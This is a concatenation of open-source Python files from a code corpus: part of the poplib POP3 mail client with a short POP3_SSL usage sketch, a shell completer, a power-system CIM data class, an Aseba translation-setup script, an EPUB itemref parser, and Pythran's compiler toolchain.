"""Unmark all messages marked for deletion."""
return self._shortcmd('RSET')
def quit(self):
"""Signoff: commit changes on server, unlock mailbox, close connection."""
resp = self._shortcmd('QUIT')
self.close()
return resp
def close(self):
"""Close the connection without assuming anything about it."""
if self.file is not None:
self.file.close()
if self.sock is not None:
try:
self.sock.shutdown(socket.SHUT_RDWR)
except OSError as e:
# The server might already have closed the connection
if e.errno != errno.ENOTCONN:
raise
finally:
self.sock.close()
self.file = self.sock = None
#__del__ = quit
# optional commands:
def rpop(self, user):
"""Not sure what this does."""
return self._shortcmd('RPOP %s' % user)
timestamp = re.compile(br'\+OK.*(<[^>]+>)')
def apop(self, user, password):
"""Authorisation
- only possible if server has supplied a timestamp in initial greeting.
Args:
user - mailbox user;
password - mailbox password.
NB: mailbox is locked by server from here to 'quit()'
"""
secret = bytes(password, self.encoding)
m = self.timestamp.match(self.welcome)
if not m:
raise error_proto('-ERR APOP not supported by server')
import hashlib
digest = m.group(1)+secret
digest = hashlib.md5(digest).hexdigest()
return self._shortcmd('APOP %s %s' % (user, digest))
def top(self, which, howmuch):
"""Retrieve message header of message number 'which'
and first 'howmuch' lines of message body.
Result is in form ['response', ['line', ...], octets].
"""
return self._longcmd('TOP %s %s' % (which, howmuch))
def uidl(self, which=None):
"""Return message digest (unique id) list.
If 'which', result contains unique id for that message
in the form 'response mesgnum uid', otherwise result is
the list ['response', ['mesgnum uid', ...], octets]
"""
if which is not None:
return self._shortcmd('UIDL %s' % which)
return self._longcmd('UIDL')
def capa(self):
"""Return server capabilities (RFC 2449) as a dictionary
>>> c=poplib.POP3('localhost')
>>> c.capa()
{'IMPLEMENTATION': ['Cyrus', 'POP3', 'server', 'v2.2.12'],
'TOP': [], 'LOGIN-DELAY': ['0'], 'AUTH-RESP-CODE': [],
'EXPIRE': ['NEVER'], 'USER': [], 'STLS': [], 'PIPELINING': [],
'UIDL': [], 'RESP-CODES': []}
>>>
Really, according to RFC 2449, the cyrus folks should avoid
having the implementation split into multiple arguments...
"""
def _parsecap(line):
lst = line.decode('ascii').split()
return lst[0], lst[1:]
caps = {}
try:
resp = self._longcmd('CAPA')
rawcaps = resp[1]
for capline in rawcaps:
capnm, capargs = _parsecap(capline)
caps[capnm] = capargs
except error_proto as _err:
raise error_proto('-ERR CAPA not supported by server')
return caps
def stls(self, context=None):
"""Start a TLS session on the active connection as specified in RFC 2595.
context - a ssl.SSLContext
"""
if not HAVE_SSL:
raise error_proto('-ERR TLS support missing')
if self._tls_established:
raise error_proto('-ERR TLS session already established')
caps = self.capa()
if not 'STLS' in caps:
raise error_proto('-ERR STLS not supported by server')
if context is None:
context = ssl._create_stdlib_context()
resp = self._shortcmd('STLS')
server_hostname = self.host if ssl.HAS_SNI else None
self.sock = context.wrap_socket(self.sock,
server_hostname=server_hostname)
self.file = self.sock.makefile('rb')
self._tls_established = True
return resp
if HAVE_SSL:
class POP3_SSL(POP3):
"""POP3 client class over SSL connection
Instantiate with: POP3_SSL(hostname, port=995, keyfile=None, certfile=None,
context=None)
hostname - the hostname of the pop3 over ssl server
port - port number
keyfile - PEM formatted file that contains your private key
certfile - PEM formatted certificate chain file
context - a ssl.SSLContext
See the methods of the parent class POP3 for more documentation.
"""
def __init__(self, host, port=POP3_SSL_PORT, keyfile=None, certfile=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT, context=None):
if context is not None and keyfile is not None:
raise ValueError("context and keyfile arguments are mutually "
"exclusive")
if context is not None and certfile is not None:
raise ValueError("context and certfile arguments are mutually "
"exclusive")
self.keyfile = keyfile
self.certfile = certfile
if context is None:
context = ssl._create_stdlib_context(certfile=certfile,
keyfile=keyfile)
self.context = context
POP3.__init__(self, host, port, timeout)
def _create_socket(self, timeout):
sock = POP3._create_socket(self, timeout)
server_hostname = self.host if ssl.HAS_SNI else None
sock = self.context.wrap_socket(sock,
server_hostname=server_hostname)
return sock
def stls(self, keyfile=None, certfile=None, context=None):
"""The method unconditionally raises an exception since the
STLS command doesn't make any sense on an already established
SSL/TLS session.
"""
raise error_proto('-ERR TLS session already established')
__all__.append("POP3_SSL")
if __name__ == "__main__":
import sys
a = POP3(sys.argv[1])
print(a.getwelcome())
a.user(sys.argv[2])
a.pass_(sys.argv[3])
a.list()
(numMsgs, totalSize) = a.stat()
for i in range(1, numMsgs + 1):
(header, msg, octets) = a.retr(i)
print("Message %d:" % i)
for line in msg:
print(' ' + line)
print('-----------------------')
a.quit()
| mit |
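For completeness, a minimal usage sketch of the POP3_SSL class defined above, mirroring the plain-POP3 test jig at the end of the module; the host and credentials are placeholders, not real values.
import poplib

def fetch_all(host, user, password):
    box = poplib.POP3_SSL(host)          # implicit SSL, default port 995
    box.user(user)
    box.pass_(password)
    num_msgs, _total_size = box.stat()
    messages = []
    for i in range(1, num_msgs + 1):
        _resp, lines, _octets = box.retr(i)
        messages.append(b'\r\n'.join(lines))
    box.quit()
    return messages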
alehander42/woosh-python | woosh/completer.py | 1 | 1740 | import os
import os.path
import woosh.parser
def complete(code, env):
try:
woo_type, expected, tokens = woosh.parser.parse_broken(code, env)
except (woosh.parser.WooError, ValueError):
return []
finished = not code or code[-1] == ' '
return [globals()['complete_%s' % tab](woo_type, tokens[-1][1], env, finished) for tab in expected]
def complete_fun(woo_type, token, env, finished=True):
# returns a list with the matching function names in env
f = env
completions = set()
while f:
completions.update(
g for g, value
in f.values.items()
if hasattr(value, 'code') and (finished or g.startswith(token)))
f = f.parent
return list(completions)
def complete_path(woo_type, token, env, finished=True):
# returns a list with the matching paths in current dir
return [f for f in os.listdir('.') if finished or f.startswith(token)]
def complete_method(woo_type, token, env, finished=True):
# returns a list with the matching methods of woo_type
if not hasattr(woo_type.return_type, 'methods'):
return []
return ['{0}{1}'.format('#' if m[0].isalpha() else '', m)
for m in woo_type.return_type.methods
if finished or m.startswith(token[1:])]
def complete_arg(woo_type, token, env, finished=True):
# returns a list with the matching kwargs of woo_type
return ['@{0}'.format(label)
for label in woo_type.kwargs
if finished or label.startswith(token[1:])] # @arg
def complete_anon_var(woo_type, token, env, finished=True):
# returns a list with the possible anon vars
if '$'.startswith(token):
return ['$']
else:
return []
| mit |
rwl/PyCIM | CIM14/CDPSM/Balanced/IEC61970/LoadModel/LoadResponseCharacteristic.py | 1 | 8379 | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.CDPSM.Balanced.IEC61970.Core.IdentifiedObject import IdentifiedObject
class LoadResponseCharacteristic(IdentifiedObject):
"""Models the characteristic response of the load demand due to to changes in system conditions such as voltage and frequency. This is not related to demand response.
If LoadResponseCharacteristic.exponentModel is True, the voltage exponents are specified and used as to calculate:
Active power component = Pnominal * (Voltage/cim:BaseVoltage.nominalVoltage) ** cim:LoadResponseCharacteristic.pVoltageExponent
Reactive power component = Qnominal * (Voltage/cim:BaseVoltage.nominalVoltage)** cim:LoadResponseCharacteristic.qVoltageExponent
Where * means 'multiply' and ** is 'raised to power of'.
"""
def __init__(self, pVoltageExponent=0.0, qConstantCurrent=0.0, pFrequencyExponent=0.0, exponentModel=False, qConstantImpedance=0.0, pConstantCurrent=0.0, qFrequencyExponent=0.0, pConstantPower=0.0, qVoltageExponent=0.0, qConstantPower=0.0, pConstantImpedance=0.0, EnergyConsumer=None, *args, **kw_args):
"""Initialises a new 'LoadResponseCharacteristic' instance.
        @param pVoltageExponent: Exponent of per unit voltage affecting real power. This model is used only when 'useExponentModel' is true.
        @param qConstantCurrent: Portion of reactive power load modeled as constant current. Used only if the useExponentModel is false. This value is normalized against the sum of qZ, qI, and qP.
        @param pFrequencyExponent: Exponent of per unit frequency affecting active power
        @param exponentModel: Indicates the exponential voltage dependency model (pVoltageExponent and qVoltageExponent) is to be used. If false, the coefficient model (consisting of pConstantImpedance, pConstantCurrent, pConstantPower, qConstantImpedance, qConstantCurrent, and qConstantPower) is to be used.
        @param qConstantImpedance: Portion of reactive power load modeled as constant impedance. Used only if the useExponentModel is false. This value is normalized against the sum of qZ, qI, and qP.
        @param pConstantCurrent: Portion of active power load modeled as constant current. Used only if the useExponentModel is false. This value is normalized against the sum of pZ, pI, and pP.
        @param qFrequencyExponent: Exponent of per unit frequency affecting reactive power
        @param pConstantPower: Portion of active power load modeled as constant power. Used only if the useExponentModel is false. This value is normalized against the sum of pZ, pI, and pP.
        @param qVoltageExponent: Exponent of per unit voltage affecting reactive power. This model is used only when 'useExponentModel' is true.
        @param qConstantPower: Portion of reactive power load modeled as constant power. Used only if the useExponentModel is false. This value is normalized against the sum of qZ, qI, and qP.
        @param pConstantImpedance: Portion of active power load modeled as constant impedance. Used only if the useExponentModel is false. This value is normalized against the sum of pZ, pI, and pP.
        @param EnergyConsumer: The set of loads that have the response characteristics.
"""
        #: Exponent of per unit voltage affecting real power. This model is used only when 'useExponentModel' is true.
        self.pVoltageExponent = pVoltageExponent
        #: Portion of reactive power load modeled as constant current. Used only if the useExponentModel is false. This value is normalized against the sum of qZ, qI, and qP.
        self.qConstantCurrent = qConstantCurrent
        #: Exponent of per unit frequency affecting active power
        self.pFrequencyExponent = pFrequencyExponent
        #: Indicates the exponential voltage dependency model (pVoltageExponent and qVoltageExponent) is to be used. If false, the coefficient model (consisting of pConstantImpedance, pConstantCurrent, pConstantPower, qConstantImpedance, qConstantCurrent, and qConstantPower) is to be used.
        self.exponentModel = exponentModel
        #: Portion of reactive power load modeled as constant impedance. Used only if the useExponentModel is false. This value is normalized against the sum of qZ, qI, and qP.
        self.qConstantImpedance = qConstantImpedance
        #: Portion of active power load modeled as constant current. Used only if the useExponentModel is false. This value is normalized against the sum of pZ, pI, and pP.
        self.pConstantCurrent = pConstantCurrent
        #: Exponent of per unit frequency affecting reactive power
        self.qFrequencyExponent = qFrequencyExponent
        #: Portion of active power load modeled as constant power. Used only if the useExponentModel is false. This value is normalized against the sum of pZ, pI, and pP.
        self.pConstantPower = pConstantPower
        #: Exponent of per unit voltage affecting reactive power. This model is used only when 'useExponentModel' is true.
        self.qVoltageExponent = qVoltageExponent
        #: Portion of reactive power load modeled as constant power. Used only if the useExponentModel is false. This value is normalized against the sum of qZ, qI, and qP.
        self.qConstantPower = qConstantPower
        #: Portion of active power load modeled as constant impedance. Used only if the useExponentModel is false. This value is normalized against the sum of pZ, pI, and pP.
        self.pConstantImpedance = pConstantImpedance
self._EnergyConsumer = []
self.EnergyConsumer = [] if EnergyConsumer is None else EnergyConsumer
super(LoadResponseCharacteristic, self).__init__(*args, **kw_args)
_attrs = ["pVoltageExponent", "qConstantCurrent", "pFrequencyExponent", "exponentModel", "qConstantImpedance", "pConstantCurrent", "qFrequencyExponent", "pConstantPower", "qVoltageExponent", "qConstantPower", "pConstantImpedance"]
_attr_types = {"pVoltageExponent": float, "qConstantCurrent": float, "pFrequencyExponent": float, "exponentModel": bool, "qConstantImpedance": float, "pConstantCurrent": float, "qFrequencyExponent": float, "pConstantPower": float, "qVoltageExponent": float, "qConstantPower": float, "pConstantImpedance": float}
_defaults = {"pVoltageExponent": 0.0, "qConstantCurrent": 0.0, "pFrequencyExponent": 0.0, "exponentModel": False, "qConstantImpedance": 0.0, "pConstantCurrent": 0.0, "qFrequencyExponent": 0.0, "pConstantPower": 0.0, "qVoltageExponent": 0.0, "qConstantPower": 0.0, "pConstantImpedance": 0.0}
_enums = {}
_refs = ["EnergyConsumer"]
_many_refs = ["EnergyConsumer"]
def getEnergyConsumer(self):
"""The set of loads that have the response characteristics.
"""
return self._EnergyConsumer
def setEnergyConsumer(self, value):
for x in self._EnergyConsumer:
x.LoadResponse = None
for y in value:
y._LoadResponse = self
self._EnergyConsumer = value
EnergyConsumer = property(getEnergyConsumer, setEnergyConsumer)
def addEnergyConsumer(self, *EnergyConsumer):
for obj in EnergyConsumer:
obj.LoadResponse = self
def removeEnergyConsumer(self, *EnergyConsumer):
for obj in EnergyConsumer:
obj.LoadResponse = None
| mit |
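A small worked example of the exponential voltage-dependency model described in the class docstring above; it is an illustrative sketch, and the nominal powers, voltages and exponents are made-up numbers rather than values from any real CIM model.
def exponent_model(p_nominal, q_nominal, voltage, nominal_voltage,
                   p_voltage_exponent, q_voltage_exponent):
    """Active/reactive power under the exponential voltage-dependency model."""
    ratio = voltage / nominal_voltage
    active = p_nominal * ratio ** p_voltage_exponent
    reactive = q_nominal * ratio ** q_voltage_exponent
    return active, reactive

# e.g. a 5 % undervoltage with exponents 1.5 (P) and 2.0 (Q)
p, q = exponent_model(100.0, 30.0, 0.95, 1.0, 1.5, 2.0)   # roughly 92.6 and 27.1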
marvelous/aseba | maintainer/translations/01_new_language.py | 2 | 5842 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Aseba - an event-based framework for distributed robot control
# Copyright (C) 2007--2015:
# Stephane Magnenat <stephane at magnenat dot net>
# (http://stephane.magnenat.net)
# and other contributors, see authors.txt for details
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import os.path
import subprocess
import shutil
import re
from path import *
import translation_tools
# some tags inside the files to help us
cpp_tag = re.compile(r"/\* insert translation here")
studio_qrc_tag = re.compile(r"<!-- insert translation here")
studio_qrc_compiler_tag = re.compile(r"<!-- insert compiler translation here")
sync_compiler_py_tag = re.compile(r"# insert translation here")
updatedoc_tag = sync_compiler_py_tag
challenge_qrc_tag = studio_qrc_tag
def insert_before_tag(input_file, output_file, tag_re, inserted_text):
with open(input_file) as in_file:
with open(output_file, "w") as out_file:
found = False
for line in in_file:
if tag_re.search(line):
found = True
# insert the text before the tag
out_file.write(inserted_text)
out_file.write(line)
if not found:
                print >> sys.stderr, "Tag not found in", input_file
return found
print "*****"
print "This will add a new language to the available translations."
print "We need first a few information."
print "*****"
print ""
translation_tools.init_commands()
name_en = raw_input("\nLanguage name (in English): ")
name = raw_input("Language name, as displayed to users (ex: Français): ")
print "\n***"
print "Hint: for a list a locales, you can look here: http://www.roseindia.net/tutorials/i18n/locales-list.shtml"
print "***\n"
code_lang = raw_input("Language code (ex: fr): ")
code_region = raw_input("Region code, if any (ex: ch): ")
if code_region == '':
code = code_lang
else:
code = code_lang + "_" + code_region
wikidot_url = ""
if raw_input("\nIs the wikidot user manual also translated and to be added to the offline help? [y/N] ").lower() == 'y':
wikidot_url = "https://aseba.wikidot.com/{}:asebausermanual".format(code) # should be good
temp = raw_input("What is its url? [{}] ".format(wikidot_url))
if temp:
wikidot_url = temp
if raw_input("\nAre you happy with your input? [y/N] ").lower() != 'y':
exit(2)
print "Generating files...\n"
os.chdir(studio_path)
# lupdate / lrelease asebastudio_x.{ts,qm}
translation_tools.do_lupdate_lrelease("asebastudio", code, " ".join([studio_path, plugin_path, vpl_path, blockly_path]))
# lupdate / lrelease compiler_x.{ts,qm}
translation_tools.do_lupdate_lrelease("compiler", code, compiler_ts_path)
os.chdir(challenge_path)
# lupdate / lrelease asebachallenge_x.{ts,qm}
translation_tools.do_lupdate_lrelease("asebachallenge", code, challenge_cpp)
print "Modifying source files...\n"
# We have to update DashelTarget.cpp
print "Updating DashelTarget.cpp..."
os.chdir(studio_path)
tmp_file = "DashelTarget.cpp.tmp"
insert_before_tag(dashel_target, tmp_file, cpp_tag, """\t\tlanguageSelectionBox->addItem(QString::fromUtf8("{}"), "{}");\n""".format(name, code))
os.remove(dashel_target)
shutil.move(tmp_file, dashel_target)
translation_tools.do_git_add(dashel_target)
print "Done\n"
# We have to update asebastudio.qrc
print "Updating asebastudio.qrc..."
tmp_file1 = "asebastudio.qrc.tmp1"
tmp_file2 = "asebastudio.qrc.tmp2"
insert_before_tag(studio_qrc, tmp_file1, studio_qrc_tag, """\t<file>asebastudio_{}.qm</file>\n""".format(code))
insert_before_tag(tmp_file1, tmp_file2, studio_qrc_compiler_tag, """\t<file>compiler_{}.qm</file>\n""".format(code))
os.remove(tmp_file1)
os.remove(studio_qrc)
shutil.move(tmp_file2, studio_qrc)
translation_tools.do_git_add(studio_qrc)
print "Done\n"
# We have to update challenge.cpp
print "Updating challenge.cpp..."
os.chdir(challenge_path)
tmp_file = "challenge.cpp.tmp"
insert_before_tag(challenge_cpp, tmp_file, cpp_tag, """\tlanguageSelectionBox->addItem(QString::fromUtf8("{}"), "{}");\n""".format(name, code))
os.remove(challenge_cpp)
shutil.move(tmp_file, challenge_cpp)
translation_tools.do_git_add(challenge_cpp)
print "Done\n"
# We have to update challenge-textures.qrc
print "Updating challenge-textures.qrc..."
tmp_file = "challenge-textures.qrc.tmp"
insert_before_tag(challenge_qrc, tmp_file, challenge_qrc_tag, """\t<file>asebachallenge_{}.qm</file>\n""".format(code))
os.remove(challenge_qrc)
shutil.move(tmp_file, challenge_qrc)
translation_tools.do_git_add(challenge_qrc)
print "Done\n"
# Update updatedoc.py, if asked by the user
if wikidot_url:
os.chdir(updatedoc_path)
print "Updating updatedoc.py"
tmp_file = "updatedoc.py.tmp"
insert_before_tag(updatedoc, tmp_file, updatedoc_tag, """ '{}':'{}',\n""".format(code, wikidot_url))
os.remove(updatedoc)
shutil.move(tmp_file, updatedoc)
translation_tools.do_git_add(updatedoc)
print "Done\n"
print "We are done! Now edit the .ts files with Qt Linguist, then run lrelease on them to generate valid .qm."
print "Finally, do not forget to commit the .ts and .qm files."
print "Have fun :-)\n"
print "*****\n"
| lgpl-3.0 |
pettarin/yael | yael/opfitemref.py | 3 | 3940 | #!/usr/bin/env python
# coding=utf-8
"""
An OPF `<itemref>` element, that is, a child of the `<spine>`.
"""
from yael.element import Element
__author__ = "Alberto Pettarin"
__copyright__ = "Copyright 2015, Alberto Pettarin (www.albertopettarin.it)"
__license__ = "MIT"
__version__ = "0.0.9"
__email__ = "alberto@albertopettarin.it"
__status__ = "Development"
class OPFItemref(Element):
"""
Build an OPF `<itemref>` element or
parse it from `obj` or `string`.
"""
A_ID = "id"
A_IDREF = "idref"
A_LINEAR = "linear"
A_PROPERTIES = "properties"
V_PAGE_SPREAD_LEFT = "page-spread-left"
V_PAGE_SPREAD_RIGHT = "page-spread-right"
V_RENDITION_ALIGN_X_CENTER = "rendition:align-x-center"
V_RENDITION_FLOW_AUTO = "rendition:flow-auto"
V_RENDITION_FLOW_PAGINATED = "rendition:flow-paginated"
V_RENDITION_FLOW_SCROLLED_CONTINUOUS = "rendition:flow-scrolled-continuous"
V_RENDITION_FLOW_SCROLLED_DOC = "rendition:flow-scrolled-doc"
V_RENDITION_LAYOUT_PRE_PAGINATED = "rendition:layout-pre-paginated"
V_RENDITION_LAYOUT_REFLOWABLE = "rendition:layout-reflowable"
V_RENDITION_ORIENTATION_AUTO = "rendition:orientation-auto"
V_RENDITION_ORIENTATION_LANDSCAPE = "rendition:orientation-landscape"
V_RENDITION_ORIENTATION_PORTRAIT = "rendition:orientation-portrait"
V_RENDITION_PAGE_SPREAD_CENTER = "rendition:page-spread-center"
V_RENDITION_SPREAD_AUTO = "rendition:spread-auto"
V_RENDITION_SPREAD_BOTH = "rendition:spread-both"
V_RENDITION_SPREAD_LANDSCAPE = "rendition:spread-landscape"
V_RENDITION_SPREAD_NONE = "rendition:spread-none"
V_RENDITION_SPREAD_PORTRAIT = "rendition:spread-portrait"
def __init__(self, internal_path=None, obj=None, string=None):
self.v_id = None
self.v_idref = None
self.v_linear = None
self.v_properties = None
Element.__init__(
self,
internal_path=internal_path,
obj=obj,
string=string)
def json_object(self, recursive=True):
obj = {
"id": self.v_id,
"idref": self.v_idref,
"linear": self.v_linear,
"properties": self.v_properties
}
return obj
def parse_object(self, obj):
# set attributes
self.v_id = obj.get(OPFItemref.A_ID)
self.v_idref = obj.get(OPFItemref.A_IDREF)
self.v_linear = obj.get(OPFItemref.A_LINEAR)
self.v_properties = obj.get(OPFItemref.A_PROPERTIES)
def has_property(self, v_property):
"""
Return True if this itemref has the given property.
:param v_property: a property name
:type v_property: str
:returns: True if the itemref has the property
:rtype: bool
"""
if self.v_properties != None:
return v_property in self.v_properties.split(" ")
return False
@property
def v_id(self):
"""
The value of the `id` attribute.
:rtype: str
"""
return self.__v_id
@v_id.setter
def v_id(self, v_id):
self.__v_id = v_id
@property
def v_idref(self):
"""
The value of the `idref` attribute.
:rtype: str
"""
return self.__v_idref
@v_idref.setter
def v_idref(self, v_idref):
self.__v_idref = v_idref
@property
def v_linear(self):
"""
The value of the `linear` attribute.
:rtype: str
"""
return self.__v_linear
@v_linear.setter
def v_linear(self, v_linear):
self.__v_linear = v_linear
@property
def v_properties(self):
"""
The value of the `properties` attribute.
:rtype: str
"""
return self.__v_properties
@v_properties.setter
def v_properties(self, v_properties):
self.__v_properties = v_properties
| mit |
pombredanne/pythran | pythran/toolchain.py | 2 | 12759 | '''
This module contains all the stuff to make your way from python code to
a dynamic library, see __init__.py for exported interfaces.
'''
from pythran.backend import Cxx
from pythran.config import cfg, make_extension
from pythran.cxxgen import PythonModule, Define, Include, Line, Statement
from pythran.cxxgen import FunctionBody, FunctionDeclaration, Value, Block
from pythran.middlend import refine
from pythran.passmanager import PassManager
from pythran.tables import pythran_ward
from pythran.types.types import extract_constructed_types
from pythran.types.type_dependencies import pytype_to_deps
from pythran.types.conversion import pytype_to_ctype
from pythran.spec import expand_specs, specs_to_docstrings
from pythran.syntax import check_specs
from pythran.version import __version__
import pythran.frontend as frontend
from datetime import datetime
from distutils.errors import CompileError
from numpy.distutils.core import setup
from numpy.distutils.extension import Extension
import numpy.distutils.ccompiler
from tempfile import mkstemp, mkdtemp
import ast
import logging
import os.path
import shutil
import sys
import glob
import hashlib
logger = logging.getLogger('pythran')
# hook taken from numpy.distutils.compiler
# with useless steps and warning removed
def CCompiler_customize(self, _, need_cxx=0):
logger.info('customize %s', self.__class__.__name__)
numpy.distutils.ccompiler.customize_compiler(self)
if need_cxx:
# In general, distutils uses -Wstrict-prototypes, but this option is
# not valid for C++ code, only for C. Remove it if it's there to
# avoid a spurious warning on every compilation.
try:
self.compiler_so.remove('-Wstrict-prototypes')
except (AttributeError, ValueError):
pass
numpy.distutils.ccompiler.replace_method(numpy.distutils.ccompiler.CCompiler,
'customize', CCompiler_customize)
def _extract_all_constructed_types(v):
return sorted(set(reduce(lambda x, y: x + y,
(extract_constructed_types(t) for t in v), [])),
key=len)
def _extract_specs_dependencies(specs):
""" Extract types dependencies from specs for each exported signature. """
deps = set()
# for each function
for signatures in specs.values():
# for each signature
for signature in signatures:
# for each argument
for t in signature:
deps.update(pytype_to_deps(t))
# Keep "include" first
return sorted(deps, key=lambda x: "include" not in x)
def _parse_optimization(optimization):
'''Turns an optimization of the form
my_optim
my_package.my_optim
into the associated symbol'''
splitted = optimization.split('.')
if len(splitted) == 1:
splitted = ['pythran', 'optimizations'] + splitted
return reduce(getattr, splitted[1:], __import__(splitted[0]))
def _get_temp(content, suffix=".cpp"):
'''Get a temporary file for given content, default extension is .cpp
    It is the user's responsibility to delete when done.'''
fd, fdpath = mkstemp(suffix)
with os.fdopen(fd, "w") as cpp:
cpp.write(content)
return fd, fdpath
class HasArgument(ast.NodeVisitor):
'''Checks if a given function has arguments'''
def __init__(self, fname):
self.fname = fname
def visit_Module(self, node):
for n in node.body:
if isinstance(n, ast.FunctionDef) and n.name == self.fname:
return len(n.args.args) > 0
return False
# PUBLIC INTERFACE STARTS HERE
def generate_cxx(module_name, code, specs=None, optimizations=None):
'''python + pythran spec -> c++ code
returns a PythonModule object
'''
if sys.version_info[0] == 3:
raise ValueError(
"Pythran does not fully support Python3, "
"it can only be used to compile C++ code "
"generated with the -E flag with a Python2 version of Pythran. "
"Sorry about this :-/")
pm = PassManager(module_name)
# front end
ir, renamings, docstrings = frontend.parse(pm, code)
# middle-end
optimizations = (optimizations or
cfg.get('pythran', 'optimizations').split())
optimizations = [_parse_optimization(opt) for opt in optimizations]
refine(pm, ir, optimizations)
# back-end
content = pm.dump(Cxx, ir)
    # instantiate the meta program
if specs is None:
class Generable(object):
def __init__(self, content):
self.content = content
def __str__(self):
return str(self.content)
generate = __str__
mod = Generable(content)
else:
# uniform typing
for fname, signatures in specs.items():
if not isinstance(signatures, tuple):
specs[fname] = (signatures,)
# verify the pythran export are compatible with the code
specs = expand_specs(specs)
check_specs(ir, specs, renamings)
specs_to_docstrings(specs, docstrings)
metainfo = {'hash': hashlib.sha256(code).hexdigest(),
'version': __version__,
'date': datetime.now()}
mod = PythonModule(module_name, docstrings, metainfo)
mod.add_to_preamble(Define("BOOST_SIMD_NO_STRICT_ALIASING", "1"))
mod.add_to_includes(Include("pythonic/core.hpp"),
Include("pythonic/python/core.hpp"),
# FIXME: only include these when needed
Include("pythonic/types/bool.hpp"),
Include("pythonic/types/int.hpp"),
Line("#ifdef _OPENMP\n#include <omp.h>\n#endif")
)
mod.add_to_includes(*[Include(inc) for inc in
_extract_specs_dependencies(specs)])
mod.add_to_includes(*content.body)
for function_name, signatures in specs.iteritems():
internal_func_name = renamings.get(function_name,
function_name)
# global variables are functions with no signatures :-)
if not signatures:
mod.add_global_var(function_name,
"{}()()".format(
pythran_ward + '{0}::{1}'.format(
module_name, internal_func_name)))
for sigid, signature in enumerate(signatures):
numbered_function_name = "{0}{1}".format(internal_func_name,
sigid)
arguments_types = [pytype_to_ctype(t) for t in signature]
has_arguments = HasArgument(internal_func_name).visit(ir)
arguments = ["a{0}".format(i)
for i in xrange(len(arguments_types))]
name_fmt = pythran_ward + "{0}::{1}::type{2}"
args_list = ", ".join(arguments_types)
specialized_fname = name_fmt.format(module_name,
internal_func_name,
"<{0}>".format(args_list)
if has_arguments else "")
result_type = "typename %s::result_type" % specialized_fname
mod.add_function(
FunctionBody(
FunctionDeclaration(
Value(
result_type,
numbered_function_name),
[Value(t, a)
for t, a in zip(arguments_types, arguments)]),
Block([Statement("return {0}()({1})".format(
pythran_ward + '{0}::{1}'.format(
module_name, internal_func_name),
', '.join(arguments)))])
),
function_name,
arguments_types
)
return mod
def compile_cxxfile(module_name, cxxfile, output_binary=None, **kwargs):
'''c++ file -> native module
Return the filename of the produced shared library
Raises CompileError on failure
'''
builddir = mkdtemp()
buildtmp = mkdtemp()
extension_args = make_extension(**kwargs)
extension = Extension(module_name,
[cxxfile],
language="c++",
**extension_args)
try:
setup(name=module_name,
ext_modules=[extension],
# fake CLI call
script_name='setup.py',
script_args=['--verbose'
if logger.isEnabledFor(logging.INFO)
else '--quiet',
'build_ext',
'--build-lib', builddir,
'--build-temp', buildtmp,
]
)
except SystemExit as e:
raise CompileError(e.args)
[target] = glob.glob(os.path.join(builddir, module_name + "*"))
if not output_binary:
output_binary = os.path.join(os.getcwd(),
module_name + os.path.splitext(target)[1])
shutil.move(target, output_binary)
shutil.rmtree(builddir)
shutil.rmtree(buildtmp)
logger.info("Generated module: " + module_name)
logger.info("Output: " + output_binary)
return output_binary
def compile_cxxcode(module_name, cxxcode, output_binary=None, keep_temp=False,
**kwargs):
'''c++ code (string) -> temporary file -> native module.
Returns the generated .so.
'''
# Get a temporary C++ file to compile
_, fdpath = _get_temp(cxxcode)
output_binary = compile_cxxfile(module_name, fdpath,
output_binary, **kwargs)
if not keep_temp:
# remove tempfile
os.remove(fdpath)
else:
logger.warn("Keeping temporary generated file:" + fdpath)
return output_binary
def compile_pythrancode(module_name, pythrancode, specs=None,
opts=None, cpponly=False, output_file=None,
**kwargs):
'''Pythran code (string) -> c++ code -> native module
Returns the generated .so (or .cpp if `cpponly` is set to true).
'''
# Autodetect the Pythran spec if not given as parameter
from pythran.spec import spec_parser
if specs is None:
specs = spec_parser(pythrancode)
# Generate C++, get a PythonModule object
module = generate_cxx(module_name, pythrancode, specs, opts)
if cpponly:
# User wants only the C++ code
_, tmp_file = _get_temp(str(module))
if not output_file:
output_file = module_name + ".cpp"
shutil.move(tmp_file, output_file)
logger.info("Generated C++ source file: " + output_file)
else:
# Compile to binary
output_file = compile_cxxcode(module_name,
str(module.generate()),
output_binary=output_file,
**kwargs)
return output_file
def compile_pythranfile(file_path, output_file=None, module_name=None,
cpponly=False, **kwargs):
"""
Pythran file -> c++ file -> native module.
Returns the generated .so (or .cpp if `cpponly` is set to true).
"""
if not output_file:
# derive module name from input file name
_, basename = os.path.split(file_path)
module_name = module_name or os.path.splitext(basename)[0]
else:
# derive module name from destination output_file name
_, basename = os.path.split(output_file)
module_name = module_name or os.path.splitext(basename)[0]
# Add compiled module path to search for imported modules
sys.path.append(os.path.dirname(file_path))
output_file = compile_pythrancode(module_name, open(file_path).read(),
output_file=output_file,
cpponly=cpponly,
**kwargs)
return output_file
def test_compile():
'''Simple passthrough compile test.
May raises CompileError Exception.
'''
